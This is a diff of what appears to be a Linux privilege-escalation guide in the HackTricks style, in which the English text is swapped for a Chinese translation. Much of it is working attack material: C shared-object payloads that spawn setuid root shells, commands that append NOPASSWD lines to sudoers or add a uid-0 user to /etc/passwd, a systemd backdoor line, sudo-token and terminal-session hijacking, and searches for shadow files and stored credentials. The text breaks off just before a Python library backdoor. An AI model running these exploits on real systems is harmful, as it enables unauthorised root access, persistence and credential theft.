+例如,遇到类似 _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (没有这样的文件或目录)"_ 的错误提示,暗示了潜在的利用可能性。 -For instance, encountering an error like _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ suggests a potential for exploitation. - -To exploit this, one would proceed by creating a C file, say _"/path/to/.config/libcalc.c"_, containing the following code: - +为了利用这一点,可以创建一个 C 文件,例如 _"/path/to/.config/libcalc.c"_,其中包含以下代码: ```c #include #include @@ -989,22 +850,18 @@ To exploit this, one would proceed by creating a C file, say _"/path/to/.config/ static void inject() __attribute__((constructor)); void inject(){ - system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); +system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` +此代码在编译和执行后,旨在通过操纵文件权限并执行具有提升权限的 shell 来提升权限。 -This code, once compiled and executed, aims to elevate privileges by manipulating file permissions and executing a shell with elevated privileges. - -Compile the above C file into a shared object (.so) file with: - +使用以下命令将上述 C 文件编译为共享对象 (.so) 文件: ```bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c ``` +最后,运行受影响的 SUID 二进制文件应该会触发漏洞,从而允许潜在的系统妥协。 -Finally, running the affected SUID binary should trigger the exploit, allowing for potential system compromise. - -## Shared Object Hijacking - +## 共享对象劫持 ```bash # Lets find a SUID using a non-standard library ldd some_suid @@ -1014,9 +871,7 @@ something.so => /lib/x86_64-linux-gnu/something.so readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` - -Now that we have found a SUID binary loading a library from a folder where we can write, lets create the library in that folder with the necessary name: - +现在我们已经找到一个从我们可以写入的文件夹加载库的 SUID 二进制文件,让我们在该文件夹中创建具有必要名称的库: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include @@ -1025,24 +880,21 @@ Now that we have found a SUID binary loading a library from a folder where we ca static void hijack() __attribute__((constructor)); void hijack() { - setresuid(0,0,0); - system("/bin/bash -p"); +setresuid(0,0,0); +system("/bin/bash -p"); } ``` - -If you get an error such as - +如果您遇到类似的错误 ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` - -that means that the library you have generated need to have a function called `a_function_name`. +这意味着您生成的库需要有一个名为 `a_function_name` 的函数。 ### GTFOBins -[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same but for cases where you can **only inject arguments** in a command. +[**GTFOBins**](https://gtfobins.github.io) 是一个经过策划的 Unix 二进制文件列表,攻击者可以利用这些文件绕过本地安全限制。[**GTFOArgs**](https://gtfoargs.github.io/) 是相同的,但适用于您只能在命令中 **注入参数** 的情况。 -The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. +该项目收集了可以被滥用以突破受限 shell、提升或维持提升权限、传输文件、生成绑定和反向 shell,以及促进其他后期利用任务的 Unix 二进制文件的合法功能。 > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ @@ -1055,96 +907,79 @@ The project collects legitimate functions of Unix binaries that can be abused to ### FallOfSudo -If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule. +如果您可以访问 `sudo -l`,您可以使用工具 [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) 来检查它是否找到任何 sudo 规则的利用方法。 -### Reusing Sudo Tokens +### 重用 Sudo 令牌 -In cases where you have **sudo access** but not the password, you can escalate privileges by **waiting for a sudo command execution and then hijacking the session token**. +在您拥有 **sudo 访问权限** 但没有密码的情况下,您可以通过 **等待 sudo 命令执行然后劫持会话令牌** 来提升权限。 -Requirements to escalate privileges: +提升权限的要求: -- You already have a shell as user "_sampleuser_" -- "_sampleuser_" have **used `sudo`** to execute something in the **last 15mins** (by default that's the duration of the sudo token that allows us to use `sudo` without introducing any password) -- `cat /proc/sys/kernel/yama/ptrace_scope` is 0 -- `gdb` is accessible (you can be able to upload it) +- 您已经作为用户 "_sampleuser_" 拥有一个 shell +- "_sampleuser_" 在 **过去 15 分钟内** **使用过 `sudo`** 执行了某些操作(默认情况下,这是允许我们在不输入任何密码的情况下使用 `sudo` 的 sudo 令牌的持续时间) +- `cat /proc/sys/kernel/yama/ptrace_scope` 为 0 +- `gdb` 可访问(您可以上传它) -(You can temporarily enable `ptrace_scope` with `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` or permanently modifying `/etc/sysctl.d/10-ptrace.conf` and setting `kernel.yama.ptrace_scope = 0`) +(您可以通过 `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` 临时启用 `ptrace_scope`,或通过永久修改 `/etc/sysctl.d/10-ptrace.conf` 并设置 `kernel.yama.ptrace_scope = 0`) -If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) - -- The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** (you won't get automatically a root shell, do `sudo su`): +如果满足所有这些要求,**您可以使用以下方法提升权限:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) +- **第一个利用** (`exploit.sh`) 将在 _/tmp_ 中创建二进制文件 `activate_sudo_token`。您可以使用它来 **在您的会话中激活 sudo 令牌**(您不会自动获得 root shell,请执行 `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` - -- The **second exploit** (`exploit_v2.sh`) will create a sh shell in _/tmp_ **owned by root with setuid** - +- 第二个漏洞 (`exploit_v2.sh`) 将在 _/tmp_ 创建一个 **由 root 拥有并设置了 setuid 的 sh shell** ```bash bash exploit_v2.sh /tmp/sh -p ``` - -- The **third exploit** (`exploit_v3.sh`) will **create a sudoers file** that makes **sudo tokens eternal and allows all users to use sudo** - +- 第**三个漏洞** (`exploit_v3.sh`) 将**创建一个 sudoers 文件**,使**sudo 令牌永久有效并允许所有用户使用 sudo** ```bash bash exploit_v3.sh sudo su ``` - ### /var/run/sudo/ts/\ -If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) to **create a sudo token for a user and PID**.\ -For example, if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing: - +如果您在该文件夹或文件夹内创建的任何文件中具有**写权限**,则可以使用二进制文件[**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools)来**为用户和PID创建sudo令牌**。\ +例如,如果您可以覆盖文件 _/var/run/sudo/ts/sampleuser_,并且您以该用户的身份拥有PID 1234的shell,则可以**获得sudo权限**而无需知道密码,方法是: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` - ### /etc/sudoers, /etc/sudoers.d -The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **by default can only be read by user root and group root**.\ -**If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**. - +文件 `/etc/sudoers` 和 `/etc/sudoers.d` 中的文件配置了谁可以使用 `sudo` 以及如何使用。这些文件 **默认情况下只能被用户 root 和组 root 读取**。\ +**如果** 你可以 **读取** 这个文件,你可能能够 **获得一些有趣的信息**,如果你可以 **写入** 任何文件,你将能够 **提升权限**。 ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ ``` - -If you can write you can abuse this permission - +如果你会写,你就可以滥用这个权限。 ```bash echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README ``` - -Another way to abuse these permissions: - +另一种滥用这些权限的方法: ```bash # makes it so every terminal can sudo echo "Defaults !tty_tickets" > /etc/sudoers.d/win # makes it so sudo never times out echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` - ### DOAS -There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` - +有一些替代 `sudo` 二进制文件的选项,例如 OpenBSD 的 `doas`,请记得检查其配置在 `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` - ### Sudo Hijacking -If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the user's command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash_profile) so when the user executes sudo, your sudo executable is executed. +如果你知道一个 **用户通常连接到一台机器并使用 `sudo`** 来提升权限,并且你在该用户上下文中获得了一个 shell,你可以 **创建一个新的 sudo 可执行文件**,该文件将以 root 身份执行你的代码,然后执行用户的命令。然后,**修改用户上下文的 $PATH**(例如在 .bash_profile 中添加新路径),这样当用户执行 sudo 时,你的 sudo 可执行文件就会被执行。 -Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) - -Or running something like: +请注意,如果用户使用不同的 shell(不是 bash),你需要修改其他文件以添加新路径。例如[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) 修改了 `~/.bashrc`、`~/.zshrc`、`~/.bash_profile`。你可以在 [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) 中找到另一个示例。 +或者运行类似的命令: ```bash cat >/tmp/sudo < (0x0068c000) - libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x005bb000) +linux-gate.so.1 => (0x0068c000) +libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) +/lib/ld-linux.so.2 (0x005bb000) ``` - -By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. - +通过将库复制到 `/var/tmp/flag15/`,它将被程序在此位置使用,如 `RPATH` 变量中指定的那样。 ``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ level15@nebula:/home/flag15$ ldd ./flag15 - linux-gate.so.1 => (0x005b0000) - libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x00737000) +linux-gate.so.1 => (0x005b0000) +libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) +/lib/ld-linux.so.2 (0x00737000) ``` - -Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` - +然后在 `/var/tmp` 中创建一个恶意库,使用 `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { - char *file = SHELL; - char *argv[] = {SHELL,0}; - setresuid(geteuid(),geteuid(), geteuid()); - execve(file,argv,0); +char *file = SHELL; +char *argv[] = {SHELL,0}; +setresuid(geteuid(),geteuid(), geteuid()); +execve(file,argv,0); } ``` +## 能力 -## Capabilities - -Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ -Read the following page to **learn more about capabilities and how to abuse them**: +Linux 能力提供了 **可用根权限的子集给一个进程**。这有效地将根 **权限分解为更小且独特的单元**。每个单元可以独立授予给进程。通过这种方式,完整的权限集被减少,从而降低了被利用的风险。\ +阅读以下页面以 **了解更多关于能力及其滥用的方法**: {{#ref}} linux-capabilities.md {{#endref}} -## Directory permissions +## 目录权限 -In a directory, the **bit for "execute"** implies that the user affected can "**cd**" into the folder.\ -The **"read"** bit implies the user can **list** the **files**, and the **"write"** bit implies the user can **delete** and **create** new **files**. +在一个目录中,**“执行”**位意味着受影响的用户可以“**cd**”进入该文件夹。\ +**“读取”**位意味着用户可以 **列出** **文件**,而 **“写入”**位意味着用户可以 **删除** 和 **创建** 新的 **文件**。 ## ACLs -Access Control Lists (ACLs) represent the secondary layer of discretionary permissions, capable of **overriding the traditional ugo/rwx permissions**. These permissions enhance control over file or directory access by allowing or denying rights to specific users who are not the owners or part of the group. This level of **granularity ensures more precise access management**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). - -**Give** user "kali" read and write permissions over a file: +访问控制列表 (ACLs) 代表了可支配权限的第二层,能够 **覆盖传统的 ugo/rwx 权限**。这些权限通过允许或拒绝特定用户(非所有者或不属于该组的用户)访问文件或目录,从而增强了对访问的控制。这种 **粒度确保了更精确的访问管理**。更多细节可以在 [**这里**](https://linuxconfig.org/how-to-manage-acls-on-linux) 找到。 +**给予** 用户 "kali" 对一个文件的读取和写入权限: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file ``` - -**Get** files with specific ACLs from the system: - +**获取**具有特定 ACL 的文件: ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` +## 打开 shell 会话 -## Open shell sessions +在 **旧版本** 中,您可能会 **劫持** 其他用户 (**root**) 的一些 **shell** 会话。\ +在 **最新版本** 中,您将只能 **连接** 到 **您自己的用户** 的屏幕会话。然而,您可能会在会话中找到 **有趣的信息**。 -In **old versions** you may **hijack** some **shell** session of a different user (**root**).\ -In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside the session**. - -### screen sessions hijacking - -**List screen sessions** +### 屏幕会话劫持 +**列出屏幕会话** ```bash screen -ls screen -ls / # Show another user' screen sessions ``` - ![](<../../images/image (141).png>) -**Attach to a session** - +**附加到会话** ```bash screen -dr #The -d is to detach whoever is attached to it screen -dr 3350.foo #In the example of the image screen -x [user]/[session id] ``` +## tmux 会话劫持 -## tmux sessions hijacking - -This was a problem with **old tmux versions**. I wasn't able to hijack a tmux (v2.1) session created by root as a non-privileged user. - -**List tmux sessions** +这是一个 **旧版 tmux** 的问题。作为非特权用户,我无法劫持由 root 创建的 tmux (v2.1) 会话。 +**列出 tmux 会话** ```bash tmux ls ps aux | grep tmux #Search for tmux consoles not using default folder for sockets tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess ``` - ![](<../../images/image (837).png>) -**Attach to a session** - +**附加到会话** ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself @@ -1296,149 +1113,125 @@ rw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs c # If you are root or devs you can access it tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket ``` - -Check **Valentine box from HTB** for an example. +检查 **Valentine box from HTB** 以获取示例。 ## SSH -### Debian OpenSSL Predictable PRNG - CVE-2008-0166 +### Debian OpenSSL 可预测 PRNG - CVE-2008-0166 -All SSL and SSH keys generated on Debian based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\ -This bug is caused when creating a new ssh key in those OS, as **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +在 2006 年 9 月到 2008 年 5 月 13 日之间生成的所有 Debian 基于系统(Ubuntu、Kubuntu 等)上的 SSL 和 SSH 密钥可能受到此漏洞的影响。\ +此漏洞是在这些操作系统中创建新 ssh 密钥时造成的,因为 **仅有 32,768 种变体是可能的**。这意味着所有可能性都可以计算,并且 **拥有 ssh 公钥后,您可以搜索相应的私钥**。您可以在此处找到计算的可能性:[https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) -### SSH Interesting configuration values +### SSH 有趣的配置值 -- **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`. -- **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`. -- **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`. +- **PasswordAuthentication:** 指定是否允许密码认证。默认值为 `no`。 +- **PubkeyAuthentication:** 指定是否允许公钥认证。默认值为 `yes`。 +- **PermitEmptyPasswords**: 当允许密码认证时,指定服务器是否允许使用空密码字符串登录账户。默认值为 `no`。 ### PermitRootLogin -Specifies whether root can log in using ssh, default is `no`. Possible values: +指定 root 是否可以使用 ssh 登录,默认值为 `no`。可能的值: -- `yes`: root can login using password and private key -- `without-password` or `prohibit-password`: root can only login with a private key -- `forced-commands-only`: Root can login only using private key and if the commands options are specified -- `no` : no +- `yes`: root 可以使用密码和私钥登录 +- `without-password` 或 `prohibit-password`: root 只能使用私钥登录 +- `forced-commands-only`: root 只能使用私钥登录,并且如果指定了命令选项 +- `no` : 不允许 ### AuthorizedKeysFile -Specifies files that contain the public keys that can be used for user authentication. It can contain tokens like `%h`, which will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example: - +指定包含可用于用户认证的公钥的文件。它可以包含像 `%h` 这样的标记,这将被主目录替换。**您可以指示绝对路径**(以 `/` 开头)或 **相对于用户主目录的相对路径**。例如: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` - -That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` +该配置将指示如果您尝试使用用户“**testusername**”的**私钥**登录,ssh将比较您的密钥的公钥与位于`/home/testusername/.ssh/authorized_keys`和`/home/testusername/access`中的公钥。 ### ForwardAgent/AllowAgentForwarding -SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**. - -You need to set this option in `$HOME/.ssh.config` like this: +SSH代理转发允许您**使用本地SSH密钥而不是将密钥**(没有密码短语!)放在服务器上。因此,您将能够**通过ssh跳转到一个主机**,然后从那里**跳转到另一个**主机**,使用**位于您**初始主机**中的**密钥**。 +您需要在`$HOME/.ssh.config`中设置此选项,如下所示: ``` Host example.com - ForwardAgent yes +ForwardAgent yes ``` +注意,如果 `Host` 是 `*`,每次用户跳转到不同的机器时,该主机将能够访问密钥(这是一项安全问题)。 -Notice that if `Host` is `*` every time the user jumps to a different machine, that host will be able to access the keys (which is a security issue). +文件 `/etc/ssh_config` 可以 **覆盖** 这些 **选项** 并允许或拒绝此配置。\ +文件 `/etc/sshd_config` 可以通过关键字 `AllowAgentForwarding` **允许** 或 **拒绝** ssh-agent 转发(默认是允许)。 -The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ -The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). - -If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**: +如果你发现在某个环境中配置了 Forward Agent,请阅读以下页面,因为 **你可能能够利用它来提升权限**: {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} -## Interesting Files +## 有趣的文件 -### Profiles files - -The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user runs a new shell**. Therefore, if you can **write or modify any of them you can escalate privileges**. +### 配置文件 +文件 `/etc/profile` 和 `/etc/profile.d/` 下的文件是 **在用户运行新 shell 时执行的脚本**。因此,如果你可以 **写入或修改其中任何一个,你可以提升权限**。 ```bash ls -l /etc/profile /etc/profile.d/ ``` +如果发现任何奇怪的配置文件脚本,您应该检查其中的 **敏感信息**。 -If any weird profile script is found you should check it for **sensitive details**. - -### Passwd/Shadow Files - -Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. Therefore it's recommended **find all of them** and **check if you can read** them to see **if there are hashes** inside the files: +### Passwd/Shadow 文件 +根据操作系统的不同,`/etc/passwd` 和 `/etc/shadow` 文件可能使用不同的名称,或者可能有备份。因此,建议 **找到所有这些文件** 并 **检查您是否可以读取** 它们,以查看 **文件中是否有哈希**: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` - -In some occasions you can find **password hashes** inside the `/etc/passwd` (or equivalent) file - +在某些情况下,您可以在 `/etc/passwd`(或等效)文件中找到 **密码哈希**。 ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` +### 可写的 /etc/passwd -### Writable /etc/passwd - -First, generate a password with one of the following commands. - +首先,使用以下命令之一生成密码。 ``` openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` - -Then add the user `hacker` and add the generated password. - +然后添加用户 `hacker` 并添加生成的密码。 ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` +例如: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` - -You can now use the `su` command with `hacker:hacker` - -Alternatively, you can use the following lines to add a dummy user without a password.\ -WARNING: you might degrade the current security of the machine. +您现在可以使用 `su` 命令与 `hacker:hacker` +或者,您可以使用以下行添加一个没有密码的虚拟用户。\ +警告:这可能会降低机器的当前安全性。 ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` +注意:在BSD平台上,`/etc/passwd`位于`/etc/pwd.db`和`/etc/master.passwd`,同时`/etc/shadow`被重命名为`/etc/spwd.db`。 -NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. - -You should check if you can **write in some sensitive files**. For example, can you write to some **service configuration file**? - +你应该检查是否可以**写入一些敏感文件**。例如,你能否写入某些**服务配置文件**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` - -For example, if the machine is running a **tomcat** server and you can **modify the Tomcat service configuration file inside /etc/systemd/,** then you can modify the lines: - +例如,如果机器正在运行 **tomcat** 服务器,并且您可以 **修改 /etc/systemd/ 中的 Tomcat 服务配置文件,** 那么您可以修改以下行: ``` ExecStart=/path/to/backdoor User=root Group=root ``` +您的后门将在下次启动 tomcat 时执行。 -Your backdoor will be executed the next time that tomcat is started. - -### Check Folders - -The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Probably you won't be able to read the last one but try) +### 检查文件夹 +以下文件夹可能包含备份或有趣的信息:**/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root**(您可能无法读取最后一个,但可以尝试) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` - -### Weird Location/Owned files - +### 奇怪的位置/拥有的文件 ```bash #root owned files in /home folders find /home -user root 2>/dev/null @@ -1450,77 +1243,59 @@ find / -type f -user root ! -perm -o=r 2>/dev/null find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null #Writable files by each group I belong to for g in `groups`; - do printf " Group $g:\n"; - find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null - done +do printf " Group $g:\n"; +find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null +done done ``` - -### Modified files in last mins - +### 最近修改的文件 ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` - -### Sqlite DB files - +### Sqlite 数据库文件 ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` - -### \*\_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files - +### \*\_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml 文件 ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` - -### Hidden files - +### 隐藏文件 ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` - -### **Script/Binaries in PATH** - +### **路径中的脚本/二进制文件** ```bash for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done ``` - -### **Web files** - +### **网页文件** ```bash ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ``` - -### **Backups** - +### **备份** ```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` +### 已知包含密码的文件 -### Known files containing passwords +阅读[**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)的代码,它搜索**可能包含密码的多个文件**。\ +**另一个有趣的工具**是:[**LaZagne**](https://github.com/AlessandroZ/LaZagne),这是一个开源应用程序,用于检索存储在本地计算机上的大量密码,适用于Windows、Linux和Mac。 -Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\ -**Another interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac. - -### Logs - -If you can read logs, you may be able to find **interesting/confidential information inside them**. The more strange the log is, the more interesting it will be (probably).\ -Also, some "**bad**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +### 日志 +如果您可以读取日志,您可能会在其中找到**有趣/机密的信息**。日志越奇怪,它就越有趣(可能)。\ +此外,一些“**错误**”配置(后门?)的**审计日志**可能允许您在审计日志中**记录密码**,正如在这篇文章中所解释的:[https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/)。 ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` +为了**读取日志,组** [**adm**](interesting-groups-linux-pe/#adm-group) 将非常有帮助。 -In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. - -### Shell files - +### Shell 文件 ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist @@ -1531,74 +1306,67 @@ In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-g ~/.zlogin #zsh shell ~/.zshrc #zsh shell ``` +### 通用凭据搜索/正则表达式 -### Generic Creds Search/Regex +您还应该检查包含“**password**”一词的文件,无论是在**名称**中还是在**内容**中,并检查日志中的IP和电子邮件,或哈希正则表达式。\ +我不会在这里列出如何做到这一切,但如果您感兴趣,可以查看[**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh)执行的最后检查。 -You should also check for files containing the word "**password**" in its **name** or inside the **content**, and also check for IPs and emails inside logs, or hashes regexps.\ -I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. +## 可写文件 -## Writable files +### Python库劫持 -### Python library hijacking - -If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the OS library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library). - -To **backdoor the library** just add at the end of the os.py library the following line (change IP and PORT): 